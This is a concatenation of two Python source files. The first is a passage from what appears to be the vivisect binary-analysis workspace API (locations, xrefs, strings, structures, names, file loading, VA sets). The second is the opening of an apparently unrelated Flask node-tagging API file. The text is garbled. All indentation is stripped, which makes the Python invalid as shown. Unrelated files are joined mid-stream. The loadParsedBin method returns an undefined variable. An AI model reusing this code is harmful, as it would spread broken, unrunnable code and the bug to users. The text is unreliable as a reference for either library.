Return the codeblock which contains the given va. A "codeblock"
is a location compatable tuple: (va, size, funcva)
"""
return self.blockmap.getMapLookup(va)
def delCodeBlock(self, va):
"""
Remove a code-block definition from the codeblock namespace.
"""
cb = self.getCodeBlock(va)
if cb is None:
raise Exception("Unknown Code Block: 0x%x" % va)
self._fireEvent(VWE_DELCODEBLOCK, cb)
def getCodeBlocks(self):
"""
Return a list of all the codeblock objects.
"""
return list(self.codeblocks)
def addXref(self, fromva, tova, reftype, rflags=0):
"""
Add an xref with the specified fromva, tova, and reftype
(see REF_ macros). This will *not* trigger any analysis.
Callers are expected to do their own xref analysis (ie, makeCode() etc)
"""
# Architecture gets to decide on actual final VA (ARM/THUMB/etc...)
tova, reftype, rflags = self.arch.archModifyXrefAddr(tova, reftype, rflags)
ref = (fromva, tova, reftype, rflags)
if ref in self.getXrefsFrom(fromva):
return
self._fireEvent(VWE_ADDXREF, (fromva, tova, reftype, rflags))
def delXref(self, ref):
"""
Remove the given xref. This *will* exception if the
xref doesn't already exist...
"""
if ref not in self.getXrefsFrom(ref[XR_FROM]):
raise Exception("Unknown Xref: %x %x %d" % ref)
self._fireEvent(VWE_DELXREF, ref)
def analyzePointer(self, va):
"""
Assume that a new pointer has been created. Check if it's
target has a defined location and if not, try to figure out
what's there. Will return the location type of the location
it recommends or None if a location is already there or it has
no idea.
"""
if self.getLocation(va) is not None:
return None
if self.isProbablyUnicode(va):
return LOC_UNI
elif self.isProbablyString(va):
return LOC_STRING
elif self.isProbablyCode(va):
return LOC_OP
return None
def getMeta(self, name, default=None):
return self.metadata.get(name, default)
def setMeta(self, name, value):
"""
Set a meta key,value pair for this workspace.
"""
self._fireEvent(VWE_SETMETA, (name,value))
def markDeadData(self, start, end):
"""
mark a virtual range as dead code.
"""
self.setMeta("deaddata:0x%08x" % start, (start, end))
def unmarkDeadData(self, start, end):
"""
unmark a virtual range as dead code
"""
self._dead_data.remove( (start,end) )
def _mcb_deaddata(self, name, value):
"""
callback from setMeta with namespace
deaddata:
that indicates a range has been added
as dead data.
"""
if value not in self._dead_data:
self._dead_data.append( value )
def isDeadData(self, va):
"""
Return boolean indicating va is in
a dead data range.
"""
for start,end in self._dead_data:
if va >= start and va <= end:
return True
return False
def initMeta(self, name, value):
"""
Set a metakey ONLY if it is not already set. Either
way return the value of the meta key.
"""
m = self.getMeta(name)
if m is None:
self.setMeta(name, value)
m = value
return m
def getTransMeta(self, mname, default=None):
'''
Retrieve a piece of "transient" metadata which is *not*
stored across runs or pushed through the event subsystem.
'''
return self.transmeta.get(mname,default)
def setTransMeta(self, mname, value):
'''
Store a piece of "transient" metadata which is *not*
stored across runs or pushed through the event subsystem.
'''
self.transmeta[mname] = value
def castPointer(self, va):
"""
Return the value for a pointer in memory at
the given location. This method does NOT
create a location object or do anything other
than parse memory.
"""
offset, bytes = self.getByteDef(va)
return e_bits.parsebytes(bytes, offset, self.psize, bigend=self.bigend)
def guessDataPointer(self, ref, tsize):
'''
Trust vivisect to do the right thing and make a value and a
pointer to that value
'''
# So we need the size check to avoid things like "aaaaa", maybe
# but maybe if we do something like the tsize must be either the
# target pointer size or in a set of them that the arch defines?
nloc = None
try:
if self.isProbablyUnicode(ref):
nloc = self.makeUnicode(ref)
elif self.isProbablyString(ref):
nloc = self.makeString(ref)
except e_exc.SegmentationViolation:
# Usually means val is 0 and we can just ignore this error
nloc = None
except Exception as e:
logger.warning('makeOpcode string making hit error %s', str(e))
nloc = None
if not nloc:
val = self.parseNumber(ref, tsize)
if (self.psize == tsize and self.isValidPointer(val)):
nloc = self.makePointer(ref, tova=val)
else:
nloc = self.makeNumber(ref, tsize)
return nloc
def makePointer(self, va, tova=None, follow=True):
"""
Create a new pointer location in the workspace. If you have already
parsed out the pointers value, you may specify tova to speed things
up.
"""
loctup = self.getLocation(va)
if loctup is not None:
if loctup[L_LTYPE] != LOC_POINTER or loctup[L_VA] != va:
logger.warning("0x%x: Attempting to make a Pointer where another location object exists (of type %r)", va, self.reprLocation(loctup))
return None
psize = self.psize
# Get and document the xrefs created for the new location
if tova is None:
tova = self.castPointer(va)
self.addXref(va, tova, REF_PTR)
ploc = self.addLocation(va, psize, LOC_POINTER)
if follow and self.isValidPointer(tova):
self.followPointer(tova)
return ploc
def makePad(self, va, size):
"""
A special utility for making a pad of a particular size.
"""
return self.addLocation(va, size, LOC_PAD, None)
def makeNumber(self, va, size, val=None):
"""
Create a number location in memory of the given size.
(you may specify val if you have already parsed the value
from memory and would like to save CPU cycles)
"""
return self.addLocation(va, size, LOC_NUMBER, None)
def parseNumber(self, va, size):
'''
Parse a <size> width numeric value from memory at <va>.
Example:
val = vw.parseNumber(0x41414140, 4)
'''
offset, bytes = self.getByteDef(va)
return e_bits.parsebytes(bytes, offset, size, bigend=self.bigend)
def _getSubstrings(self, va, size, ltyp):
# rip through the desired memory range to populate any substrings
subs = set()
end = va + size
for offs in range(va, end, 1):
loc = self.getLocation(offs, range=True)
if loc and loc[L_LTYPE] == LOC_STRING and loc[L_VA] > va:
subs.add((loc[L_VA], loc[L_SIZE]))
if loc[L_TINFO]:
subs = subs.union(set(loc[L_TINFO]))
return list(subs)
def _getStrTinfo(self, va, size, subs):
ploc = self.getLocation(va, range=False)
if ploc:
# the string we're making is a substring of some outer one
# still make this string location, but let the parent know about us too and our
# children as well. Ultimately, the outermost parent should be responsible for
# knowing about all it's substrings
modified = False
pva, psize, ptype, pinfo = ploc
if ptype not in (LOC_STRING, LOC_UNI):
return va, size, subs
if (va, size) not in pinfo:
modified = True
pinfo.append((va, size))
for sva, ssize in subs:
if (sva, ssize) not in pinfo:
modified = True
pinfo.append((sva, ssize))
tinfo = pinfo
if modified:
va = pva
size = psize
else:
tinfo = subs
return va, size, tinfo
def makeString(self, va, size=None):
"""
Create a new string location at the given VA. You may optionally
specify size. If size==None, the string will be parsed as a NULL
terminated ASCII string.
Substrings are also handled here. Generally, the idea is:
* if the memory range is completey undefined, we just create a new string at the VA specified (provided that asciiStringSize return a size greater than 0 or the parameter size is greater than 0)
* if we create a string A at virtual address 0x40 with size 20, and then later a string B at virtual
address 0x44, we won't actually make a new location for the string B, but rather add info to the
tinfo portion of the location tuple for string A, and when trying to retrieve string B via getLocation,
we'll make up a (sort of) fake location tuple for string B, provided that range=True is passed to
getLocation
* if we create string A at virtual address 0x40, and then later a string B at virtual 0x30
that has a size of 16 or more, we overwrite the string A with the location information for string B,
and demote string A to being a tuple of (VA, size) inside of string B's location information.
This method only captures suffixes, but perhaps in the future we'll have symbolik resolution that can
capture true substrings that aren't merely suffixes.
This same formula is applied to unicode detection as well
"""
if size is None:
size = self.asciiStringSize(va)
if size <= 0:
raise Exception("Invalid String Size: %d" % size)
# rip through the desired memory range to populate any substrings
subs = self._getSubstrings(va, size, LOC_STRING)
pva, psize, tinfo = self._getStrTinfo(va, size, subs)
if self.getName(va) is None:
m = self.readMemory(va, size-1).replace(b'\n', b'')
self.makeName(va, "str_%s_%.8x" % (m[:16].decode('utf-8'), va))
return self.addLocation(pva, psize, LOC_STRING, tinfo=tinfo)
def makeUnicode(self, va, size=None):
if size is None:
size = self.uniStringSize(va)
if size <= 0:
raise Exception("Invalid Unicode Size: %d" % size)
subs = self._getSubstrings(va, size, LOC_UNI)
pva, psize, tinfo = self._getStrTinfo(va, size, subs)
if self.getName(va) is None:
m = self.readMemory(va, size-1).replace(b'\n', b'').replace(b'\0', b'')
try:
self.makeName(va, "wstr_%s_%.8x" % (m[:16].decode('utf-8'), va))
except:
self.makeName(va, "wstr_%s_%.8x" % (m[:16],va))
return self.addLocation(pva, psize, LOC_UNI, tinfo=tinfo)
def addConstModule(self, modname):
'''
Add constants declared within the named module
to the constants resolver namespace.
Example: vw.addConstModule('vstruct.constants.ntstatus')
'''
mod = self.loadModule(modname)
self.vsconsts.addModule(mod)
def addStructureModule(self, namespace, modname):
'''
Add a vstruct structure module to the workspace with the given
namespace.
Example: vw.addStructureModule('ntdll', 'vstruct.defs.windows.win_5_1_i386.ntdll')
This allows subsequent struct lookups by names like
'''
mod = self.loadModule(modname)
self.vsbuilder.addVStructNamespace(namespace, mod)
def getStructure(self, va, vstructname):
"""
Parse and return a vstruct object for the given name. This
(like parseOpcode) does *not* require that the location be a struct
and will not create one (use makeStructure).
"""
s = vstruct.getStructure(vstructname)
if s is None:
s = self.vsbuilder.buildVStruct(vstructname)
if s is not None:
bytes = self.readMemory(va, len(s))
s.vsParse(bytes)
return s
def makeStructure(self, va, vstructname, vs=None):
"""
Make a location which is a structure and will be parsed/accessed
by vstruct. You must specify the vstruct name for the structure
you wish to have at the location. Returns a vstruct from the
location.
"""
if vs is None:
vs = self.getStructure(va, vstructname)
self.addLocation(va, len(vs), LOC_STRUCT, vstructname)
# Determine if there are any pointers we need make
# xrefs for...
offset = 0
for p in vs.vsGetPrims():
if isinstance(p, vs_prims.v_ptr):
vptr = p.vsGetValue()
if self.isValidPointer(vptr):
self.addXref(va+offset, vptr, REF_PTR)
offset += len(p)
return vs
def getUserStructNames(self):
'''
Retrive the list of the existing user-defined structure
names.
Example:
for name in vw.getUserStructNames():
print('Structure Name: %s' % name)
'''
return self.vsbuilder.getVStructCtorNames()
def getUserStructSource(self, sname):
'''
Get the source code (as a string) for the given user
defined structure.
Example:
ssrc = vw.getUserStructSource('MyStructureThing')
'''
return self.getMeta('ustruct:%s' % sname)
def setUserStructSource(self, ssrc):
'''
Save the input string as a C structure definition for the
workspace. User-defined structures may then be applied
to locations, or further edited in the future.
Example:
src = "struct woot { int x; int y; };"
vw.setUserStructSource( src )
'''
# First, we make sure it compiles...
ctor = vs_cparse.ctorFromCSource( ssrc )
# Then, build one to get the name from it...
vs = ctor()
cname = vs.vsGetTypeName()
self.setMeta('ustruct:%s' % cname, ssrc)
return cname
def asciiStringSize(self, va):
"""
Return the size (in bytes) of the ascii string
at the specified location (or -1 if no terminator
is found in the memory map)
"""
offset, bytez = self.getByteDef(va)
foff = bytez.find(b'\x00', offset)
if foff == -1:
return len(bytez) - offset
return (foff - offset) + 1
def uniStringSize(self, va):
"""
Return the size (in bytes) of the unicode string
at the specified location (or -1 if no terminator
is found in the memory map)
"""
offset, bytez = self.getByteDef(va)
foff = bytez.find(b'\x00\x00', offset)
if foff == -1:
return foff
return (foff - offset) + 2
def addLocation(self, va, size, ltype, tinfo=None):
"""
Add a location tuple.
"""
ltup = (va, size, ltype, tinfo)
#loc = self.locmap.getMapLookup(va)
#if loc is not None:
#raise Exception('Duplicate Location: (is: %r wants: %r)' % (loc,ltup))
self._fireEvent(VWE_ADDLOCATION, ltup)
return ltup
def getLocations(self, ltype=None, linfo=None):
"""
Return a list of location objects from the workspace
of a particular type.
"""
if ltype is None:
return list(self.loclist)
if linfo is None:
return [ loc for loc in self.loclist if loc[2] == ltype ]
return [ loc for loc in self.loclist if (loc[2] == ltype and loc[3] == linfo) ]
def isLocation(self, va, range=False):
"""
Return True if the va represents a location already.
"""
if self.getLocation(va, range=range) is not None:
return True
return False
def isLocType(self, va, ltype):
"""
You may use this to test if a given VA represents
a location of the specified type.
example:
if vw.isLocType(0x41414141, LOC_STRING):
print("string at: 0x41414141")
"""
# make it operate like py2 did
if va is None:
return False
tup = self.getLocation(va)
if tup is None:
return False
return tup[L_LTYPE] == ltype
def getLocation(self, va, range=True):
"""
Return the va,size,ltype,tinfo tuple for the given location.
(specify range=True to potentially match a va that is inside
a location rather than the beginning of one, this behavior
only affects strings/substring retrieval currently)
"""
loc = self.locmap.getMapLookup(va)
if not loc:
return loc
if range and loc[L_LTYPE] in (LOC_STRING, LOC_UNI):
# dig into any sublocations that may have been created, trying to find the best match
# possible, where "best" means the substring that both contains the va, and has no substrings
# that contain the va.
if not loc[L_TINFO]:
return loc
subs = sorted(loc[L_TINFO], key=lambda k: k[0], reverse=False)
ltup = loc
for sva, ssize in subs:
if sva <= va < sva + ssize:
ltup = (sva, ssize, loc[L_LTYPE], [])
return ltup
else:
return loc
def getLocationRange(self, va, size):
"""
A "location range" is a list of location tuples where
undefined space *will* be represented by LOC_UNDEF tuples
to provide a complete accounting of linear workspace.
"""
ret = []
endva = va+size
undefva = None
while va < endva:
ltup = self.getLocation(va)
if ltup is None:
if undefva is None:
undefva = va
va += 1
else:
if undefva is not None:
ret.append((undefva, va-undefva, LOC_UNDEF, None))
undefva = None
ret.append(ltup)
va += ltup[L_SIZE]
# Mop up any hanging udefs
if undefva is not None:
ret.append((undefva, va-undefva, LOC_UNDEF, None))
return ret
def delLocation(self, va):
"""
Delete the given Location object from the binary
(removes any xrefs/etc for the location as well)
This will raise InvalidLocation if the va is not
an exact match for the beginning of a location.
"""
loc = self.getLocation(va)
if loc is None:
raise InvalidLocation(va)
# remove xrefs from this location
for xref in self.getXrefsFrom(va):
self.delXref(xref)
self._fireEvent(VWE_DELLOCATION, loc)
def getRenderInfo(self, va, size):
"""
Get nearly everything needed to render a workspace area
to a display. This function *greatly* speeds up interface
code and is considered "tightly coupled" with the asmview
code. (and is therefore subject to change).
"""
locs = []
funcs = {}
names = {}
comments = {}
extras = {}
for loc in self.getLocationRange(va, size):
lva, lsize, ltype, tinfo = loc
locs.append(loc)
name = self.getName(lva)
isfunc = self.isFunction(lva)
cmnt = self.getComment(lva)
if name is not None:
names[lva] = name
if isfunc == True:
funcs[lva] = True
if cmnt is not None:
comments[lva] = cmnt
if ltype == LOC_UNDEF:
# Expand out all undefs so we can send all the info
endva = lva + lsize
while lva < endva:
uname = self.getName(lva)
ucmnt = self.getComment(lva)
if uname is not None:
names[lva] = uname
if ucmnt is not None:
comments[lva] = ucmnt
#ret.append(((lva, 1, LOC_UNDEF, None), self.getName(lva), False, self.getComment(lva)))
lva += 1
elif ltype == LOC_OP:
extras[lva] = self.parseOpcode(lva)
elif ltype == LOC_STRUCT:
extras[lva] = self.getStructure(lva, tinfo)
return locs, funcs, names, comments, extras
def getPrevLocation(self, va, adjacent=True):
"""
Get the previous location behind this one. If adjacent
is true, only return a location which is IMMEDIATELY behind
the given va, otherwise search backward for a location until
you find one or hit the edge of the segment.
"""
va -= 1
ret = self.locmap.getMapLookup(va)
if ret is not None:
return ret
if adjacent:
return None
va -= 1
while va > 0:
ret = self.locmap.getMapLookup(va)
if ret is not None:
return ret
va -= 1
return None
def vaByName(self, name):
return self.va_by_name.get(name, None)
def getLocationByName(self, name):
"""
Return a location object by the name of the
location.
"""
va = self.vaByName(name)
if va is None:
raise InvalidLocation(0, "Unknown Name: %s" % name)
return self.getLocation(va)
def getNames(self):
"""
Return a list of tuples containing (va, name)
"""
return list(self.name_by_va.items())
def getName(self, va, smart=False):
'''
Returns the name of the specified virtual address (or None).
Smart mode digs beyond simple name lookups, as follows:
If va falls within a known function in the workspace, we return "funcname+<delta>".
If not, and the va falls within a mapped binary, we return "filename+<delta>"
'''
name = self.name_by_va.get(va)
if name is not None or not smart:
return name
# TODO: by previous symbol?
# by function
baseva = self.getFunction(va)
basename = self.name_by_va.get(baseva, None)
if self.isFunction(va):
basename = 'sub_0%x' % va
# by filename
if basename is None:
basename = self.getFileByVa(va)
if basename is None:
return None
baseva = self.getFileMeta(basename, 'imagebase')
delta = va - baseva
if delta:
pom = ('', '+')[delta>0]
name = "%s%s%s" % (basename, pom, hex(delta))
else:
name = basename
return name
def makeName(self, va, name, filelocal=False, makeuniq=False):
"""
Set a readable name for the given location by va. There
*must* be a Location defined for the VA before you may name
it. You may set a location's name to None to remove a name.
makeuniq allows Vivisect to append some number to make the name unique.
This behavior allows for colliding names (eg. different versions of a function)
to coexist in the same workspace.
default behavior is to fail on duplicate (False).
"""
if filelocal:
segtup = self.getSegment(va)
if segtup is None:
self.vprint("Failed to find file for 0x%.8x (%s) (and filelocal == True!)" % (va, name))
if segtup is not None:
fname = segtup[SEG_FNAME]
if fname is not None:
name = "%s.%s" % (fname, name)
oldva = self.vaByName(name)
# If that's already the name, ignore the event
if oldva == va:
return
if oldva is not None:
if not makeuniq:
raise DuplicateName(oldva, va, name)
else:
logger.debug('makeName: %r already lives at 0x%x', name, oldva)
# tack a number on the end
index = 0
newname = "%s_%d" % (name, index)
newoldva = self.vaByName(newname)
while self.vaByName(newname) not in (None, newname):
# if we run into the va we're naming, that's the name still
if newoldva == va:
return newname
logger.debug('makeName: %r already lives at 0x%x', newname, newoldva)
index += 1
newname = "%s_%d" % (name, index)
newoldva = self.vaByName(newname)
name = newname
self._fireEvent(VWE_SETNAME, (va,name))
return name
def saveWorkspace(self, fullsave=True):
if self.server is not None:
return
modname = self.getMeta("StorageModule")
filename = self.getMeta("StorageName")
if modname is None:
raise Exception("StorageModule not specified!")
if filename is None:
raise Exception("StorageName not specified!")
# Usually this is "vivisect.storage.basicfile
mod = self.loadModule(modname)
# If they specified a full save, *or* this event list
# has never been saved before, do a full save.
if fullsave:
mod.saveWorkspace(self, filename)
else:
mod.saveWorkspaceChanges(self, filename)
self._createSaveMark()
def loadFromFd(self, fd, fmtname=None, baseaddr=None):
"""
Read the first bytes of the file descriptor and see if we can identify the type.
If so, load up the parser for that file type, otherwise raise an exception.
Returns the file md5
"""
mod = None
fd.seek(0)
if fmtname is None:
bytes = fd.read(32)
fmtname = viv_parsers.guessFormat(bytes)
mod = viv_parsers.getParserModule(fmtname)
if hasattr(mod, "config"):
self.mergeConfig(mod.config)
fd.seek(0)
fname = mod.parseFd(self, fd, filename=None, baseaddr=baseaddr)
outfile = hashlib.md5(fd.read()).hexdigest()
self.initMeta("StorageName", outfile+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
return fname
def loadParsedBin(self, pbin, fmtname=None, baseaddr=None):
'''
Load an already parsed PE or Elf file into the workspace. Raises an exception if
the file isn't one of those two.
Returns the file md5
'''
fd = pbin.fd
fd.seek(0)
if fmtname is None:
byts = fd.read(32)
fmtname = viv_parsers.guessFormat(byts)
filename = hashlib.md5(fd.read()).hexdigest()
mod = viv_parsers.getParserModule(fmtname)
if hasattr(mod, "config"):
self.mergeConfig(mod.config)
if fmtname == 'pe':
mod.loadPeIntoWorkspace(self, pbin)
elif fmtname == 'elf':
mod.loadElfIntoWorkspace(self, pbin)
else:
raise Exception('Failed to load in the parsed module for format %s', fmtname)
self.initMeta("StorageName", filename+".viv")
self._snapInAnalysisModules()
return fname
def _saveSymbolCaches(self):
if not self.config.vdb.SymbolCacheActive:
return
pathstr = self.config.vdb.SymbolCachePath
symcache = e_symcache.SymbolCachePath(pathstr)
symsbyfile = collections.defaultdict(list)
# Get the image base addresses
imgbases = {}
for fname in self.getFiles():
imgbases[ fname ] = self.getFileMeta(fname,'imagebase')
for va,name in self.name_by_va.items():
mmap = self.getMemoryMap(va)
if mmap is None:
continue
symva = va - imgbases.get(mmap[3], va)
if symva:
symtype = e_resolv.SYMSTOR_SYM_SYMBOL
if self.isFunction(va):
symtype = e_resolv.SYMSTOR_SYM_FUNCTION
symsbyfile[mmap[3]].append((symva, 0, name, symtype))
for filenorm, symtups in symsbyfile.items():
symhash = self.getFileMeta(filenorm, 'SymbolCacheHash')
if symhash is None:
continue
self.vprint('Saving Symbol Cache: %s (%d syms)' % (symhash,len(symtups)))
symcache.setCacheSyms( symhash, symtups )
def loadFromFile(self, filename, fmtname=None, baseaddr=None):
"""
Read the first bytes of the file and see if we can identify the type.
If so, load up the parser for that file type, otherwise raise an exception.
( if it's a workspace, trigger loadWorkspace() as a convenience )
Returns the basename the file was given on load.
"""
mod = None
if fmtname is None:
fmtname = viv_parsers.guessFormatFilename(filename)
if fmtname in STORAGE_MAP:
self.setMeta('StorageModule', STORAGE_MAP[fmtname])
self.loadWorkspace(filename)
return self.normFileName(filename)
mod = viv_parsers.getParserModule(fmtname)
fname = mod.parseFile(self, filename=filename, baseaddr=baseaddr)
self.initMeta("StorageName", filename+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
return fname
def loadFromMemory(self, memobj, baseaddr, fmtname=None):
"""
Load a memory map (or potentially a mapped binary file)
from the memory object's map at baseaddr.
"""
mod = None
if fmtname is None:
bytez = memobj.readMemory(baseaddr, 32)
fmtname = viv_parsers.guessFormat(bytez)
# TODO: Load workspace from memory?
mod = viv_parsers.getParserModule(fmtname)
mod.parseMemory(self, memobj, baseaddr)
mapva, mapsize, mapperm, mapfname = memobj.getMemoryMap(baseaddr)
if not mapfname:
mapfname = 'mem_map_%.8x' % mapva
self.initMeta('StorageName', mapfname+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
def getFiles(self):
"""
Return the current list of file objects in this
workspace.
"""
return list(self.filemeta.keys())
def normFileName(self, filename):
normname = os.path.basename(filename).lower()
# Strip off an extension
if normname.find('.') != -1:
parts = normname.split('.')
normname = '_'.join(parts[:-1])
ok = string.ascii_letters + string.digits + '_'
chars = list(normname)
for i in range(len(chars)):
if chars[i] not in ok:
chars[i] = '_'
normname = ''.join(chars)
#if normname[0].isdigit():
#normname = '_' + normname
return normname
def addFile(self, filename, imagebase, md5sum):
"""
Create and add a new vivisect File object for the
specified information. This will return the file
object which you may then use to do things like
add imports/exports/segments etc...
"""
nname = self.normFileName(filename)
if nname in self.filemeta:
raise Exception("Duplicate File Name: %s" % nname)
self._fireEvent(VWE_ADDFILE, (nname, imagebase, md5sum))
return nname
def addEntryPoint(self, va):
'''
Add an entry point to the definition for the given file. This
will hint the analysis system to create functions when analysis
is run.
NOTE: No analysis is triggered by this function.
'''
self.setVaSetRow('EntryPoints', (va,))
def getEntryPoints(self):
'''
Get all the parsed entry points for all the files loaded into the
workspace.
Example: for va in vw.getEntryPoints():
'''
return [ x for x, in self.getVaSetRows('EntryPoints') ]
def setFileMeta(self, fname, key, value):
"""
Store a piece of file specific metadata (python primatives are best for values)
"""
if fname not in self.filemeta:
raise Exception("Invalid File: %s" % fname)
self._fireEvent(VWE_SETFILEMETA, (fname, key, value))
def getFileMeta(self, filename, key, default=None):
"""
Retrieve a piece of file specific metadata
"""
d = self.filemeta.get(filename)
if d is None:
raise Exception("Invalid File: %s" % filename)
return d.get(key, default)
def getFileMetaDict(self, filename):
'''
Retrieve the file metadata for this file as a key:val dict.
'''
d = self.filemeta.get(filename)
if d is None:
raise Exception('Invalid File: %s' % filename)
return d
def getFileByVa(self, va):
segtup = self.getSegment(va)
if segtup is None:
return None
return segtup[SEG_FNAME]
def getLocationDistribution(self):
# NOTE: if this changes, don't forget the report module!
totsize = 0
for mapva, mapsize, mperm, mname in self.getMemoryMaps():
totsize += mapsize
loctot = 0
ret = {}
for i in range(LOC_MAX):
cnt = 0
size = 0
for lva,lsize,ltype,tinfo in self.getLocations(i):
cnt += 1
size += lsize
loctot += size
tname = loc_type_names.get(i, 'Unknown')
ret[i] = (tname, cnt, size, int((size/float(totsize))*100))
# Update the undefined based on totals...
undeftot = totsize-loctot
ret[LOC_UNDEF] = ('Undefined', 0, undeftot, int((undeftot/float(totsize)) * 100))
return ret
#################################################################
#
# VA Set API
#
def getVaSetNames(self):
"""
Get a list of the names of the current VA lists.
"""
return list(self.vasets.keys())
def getVaSetDef(self, name):
"""
Get the list of (name, type) pairs which make up the
rows for this given VA set (the first one *always* the VA, but
you can name it as you like...)
"""
x = self.vasetdefs.get(name)
if x is None:
raise InvalidVaSet(name)
return x
def getVaSetRows(self, name):
"""
Get a list of the rows in this VA set.
"""
x = self.vasets.get(name)
if x is None:
raise InvalidVaSet(name)
# yes, this is weird. but it's how python2 returns values()
return list(x.values())
def getVaSet(self, name):
"""
Get the dictionary of va:<rowdata> entries.
"""
x = self.vasets.get(name)
if x is None:
raise InvalidVaSet(name)
return x
def addVaSet(self, name, defs, rows=()):
"""
Add a va set:
name - The name for this VA set
defs - List of (<name>,<type>) tuples for the rows (va is always first)
rows - An initial set of rows for values in this set.
"""
self._fireEvent(VWE_ADDVASET, (name, defs, rows))
def delVaSet(self, name):
"""
Delete a VA set by name.
"""
if name not in self.vasets:
raise Exception("Unknown VA Set: %s" % name)
self._fireEvent(VWE_DELVASET, name)
def setVaSetRow(self, name, rowtup):
"""
Use this API to update the row data for a particular
entry in the VA set.
"""
self._fireEvent(VWE_SETVASETROW, (name, rowtup))
def getVaSetRow(self, name, va):
'''
Retrieve the va set row for va in the va set named name.
Example:
row = vw.getVaSetRow('WootFunctions', fva)
'''
vaset = self.vasets.get( name )
if vaset is None:
return None
return vaset.get( va )
def delVaSetRow(self, name, va):
"""
Use this API to delete the rowdata associated
with the specified VA from the set.
"""
if name not in self.vasets:
raise Exception("Unknown VA Set: %s" % name)
self._fireEvent(VWE_DELVASETROW, (name, va))
#################################################################
#
# Shared Workspace APIs
#
def chat(self, msg):
uname = e_config.getusername()
# FIXME this should be part of a UI event model.
self._fireEvent(VWE_CHAT, (uname, msg))
def iAmLeader(self, winname):
'''
Announce that your workspace is leading a window with the
specified name. This allows others to opt-in to following
the nav events for the given window name.
Example:
vw.iAmLeader('WindowTitle')
'''
if not self.server:
raise Exception('iAmLeader() requires being connected to a server.')
user = e_config.getusername()
self.server._fireEvent(VTE_MASK | VTE_IAMLEADER, (user,winname))
def followTheLeader(self, winname, expr):
'''
Announce a new memory expression to navigate to if if a given window
is following the specified user/winname
Example:
vw.followTheLeader('FunExample', 'sub_08042323')
'''
if not self.server:
raise Exception('followTheLeader() requires being connected to a server.')
user = e_config.getusername()
self.server._fireEvent(VTE_MASK | VTE_FOLLOWME, (user,winname, expr))
#################################################################
#
# Color Map API
#
def getColorMaps(self):
"""
Return a list of the names of the given color maps
"""
return list(self.colormaps.keys())
def addColorMap(self, mapname, colormap):
"""
Add a colormap dictionary with the given name for the map.
(A colormap dictionary is va:color entries)
"""
self._fireEvent(VWE_ADDCOLOR, (mapname, colormap))
def delColorMap(self, mapname):
self._fireEvent(VWE_DELCOLOR, mapname)
def getColorMap(self, mapname):
"""
Return the colormap dictionary for the given map name.
"""
return self.colormaps.get(mapname)
def _getNameParts(self, name, va):
'''
Return the given name in three parts:
fpart: filename, if applicable (for file-local names)
npart: base name
vapart: address, if tacked on the end
If any of these are not applicable, they will return None for that field.
'''
fpart = None
npart = name
vapart = None
fname = self.getFileByVa(va)
vastr = '_%.8x' % va
if name.startswith(fname + '.'):
fpart, npart = name.split('.', 1)
elif name.startswith('*.'):
skip, npart = name.split('.', 1)
if npart.endswith(vastr) and not npart == 'sub' + vastr:
npart, vapart = npart.rsplit('_', 1)
return fpart, npart, vapart
def _addNamePrefix(self, name, va, prefix, joinstr=''):
'''
Add a prefix to the given name paying attention to the filename prefix, and
any VA suffix which may exist.
'''
fpart, npart, vapart = self._getNameParts(name, va)
if fpart is None and vapart is None:
name = joinstr.join([prefix, npart])
elif vapart is None:
name = fpart + '.' + joinstr.join([prefix, npart])
elif fpart is None:
name = joinstr.join([prefix, npart])
else:
name = fpart + '.' + joinstr.join([prefix, npart]) + '_%s' % vapart
return name
##########################################################
#
# The envi.symstore.resolver.SymbolResolver API...
#
def getSymByName(self, name):
# Check for a sym
va = self.vaByName(name)
if va is not None:
return e_resolv.Symbol(name, va, 0)
# check for the need for a deref.
d = self.filemeta.get(name)
if d is not None:
return VivFileSymbol(self, name, d.get("imagebase"), 0, self.psize)
def getSymByAddr(self, addr, exact=True):
name = self.getName(addr)
if name is None:
if self.isValidPointer(addr):
name = "loc_%.8x" % addr
if name is not None:
#FIXME fname
#FIXME functions/segments/etc...
return e_resolv.Symbol(name, addr, 0)
def setSymHint(self, va, idx, hint):
'''
Set a symbol hint which will be used in place of operand
values during disassembly among other things...
You may also set hint=None to delete sym hints.
'''
self._fireEvent(VWE_SYMHINT, (va, idx, hint))
def getSymHint(self, va, idx):
h = self.getFref(va, idx)
if h is not None:
f = self.getFunction(va)
loctup = self.getFunctionLocal(f, h)
if loctup:
return loctup[1]
return self.symhints.get((va, idx), None)
class VivFileSymbol(e_resolv.FileSymbol):
# A namespace tracker thingie...
def __init__(self, vw, fname, base, size, width=4):
self.vw = vw
e_resolv.FileSymbol.__init__(self, fname, base, size, width)
def getSymByName(self, name):
return self.vw.getSymByName("%s.%s" % (self.name, name))
def getVivPath(*pathents):
dname = os.path.dirname(__file__)
dname = os.path.abspath(dname)
return os.path.join(dname, *pathents)
##############################################################################
# The following are touched during the release process by bump2version.
# You should have no reason to modify these directly
version = (1, 0, 5)
verstring = '.'.join([str(x) for x in version])
commit = ''
|
resource_api.py
|
from flask import Blueprint, request
from flask_jwt_extended import jwt_required, get_jwt_identity
from models.node_tags import NodeTags
from models.scheduler import Scheduler
from models.container_image_registry import RegistryCredential
from models.user import User, Role
from flask import current_app
from utils.response import set_response
from utils.decorators import non_read_only_user, admin_user_only
from utils.custom_exception import InternalError, InvalidUsage, DFError, Forbidden
from utils.helper import websocketio_channel_name_format, get_random_string, mkdir_recursive, rmdir_recursive
import json
from utils import resource
from resource_models.node import Node
from utils import constants
from croniter import croniter
from utils.esconn import ESConn
from utils.constants import ES_TERMS_AGGR_SIZE
import urllib.parse
import requests
from config.redisconfig import redis
import subprocess
import os
from copy import deepcopy
from flask import send_from_directory
import multiprocessing
from utils.node_utils import NodeUtils
import time
import eventlet
resource_api = Blueprint("resource_api", __name__)
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_ADD_TAGS, methods=["POST"],
endpoint="api_v1_5_add_tags")
@jwt_required
@non_read_only_user
def add_tags(node_id):
"""
Node Control API - Add User Defined Tags
---
tags:
- Node Control
security:
- Bearer: []
operationId: addUserDefinedTags
description: Add given tags to this node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Add tags to this node for easy identification
schema:
type: object
properties:
user_defined_tags:
type: array
example: [prod, dev]
uniqueItems: true
default: []
description: Add tags to this node for easy identification
items:
type: string
example: dev
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
